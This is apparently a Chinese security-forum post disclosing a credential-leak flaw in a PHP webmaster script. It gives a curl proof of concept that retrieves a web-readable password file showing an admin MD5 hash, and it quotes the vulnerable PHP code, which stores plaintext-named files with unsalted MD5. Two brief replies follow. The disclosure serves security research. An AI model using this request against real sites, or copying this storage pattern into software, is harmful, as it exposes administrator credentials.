Adult Webmaster PHP密码泄露漏洞

admin

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
[1] Administrative Credential Disclosure

PoC:

root@kali:/# curl http://localhost/home/caspers/public_html/demo/admin/userpwdadfasdfre.txt

admin:3a4ebf16a4795ad258e5408bae7be341

#

Vulnerable Code:
[+] admin/common.php

1. 
   
2.         // Check user existance
   
3.         $pfile = fopen("userpwdadfasdfre.txt","a+");
   
4.     rewind($pfile);
   
5. 
   
6.     while (!feof($pfile)) {
   
7.         $line = fgets($pfile);
   
8.         $tmp = explode(':', $line);
   
9.         if ($tmp[0] == $user) {
   
10.             $errorText = "The selected user name is taken!";
    
11.             break;
    
12.         }
    
13.     }
    
14. 
    
15.     // If everything is OK -> store user data
    
16.     if ($errorText == ''){
    
17.                 // Secure password string
    
18.                 $userpass = md5($pass1);
    
19. 
    
20.                 fwrite($pfile, "\r\n$user:$userpass");
    
21.     }
    
22. 
    
23.     fclose($pfile);

复制代码

不错不错，楼主您辛苦了。。。

路过，支持一下啦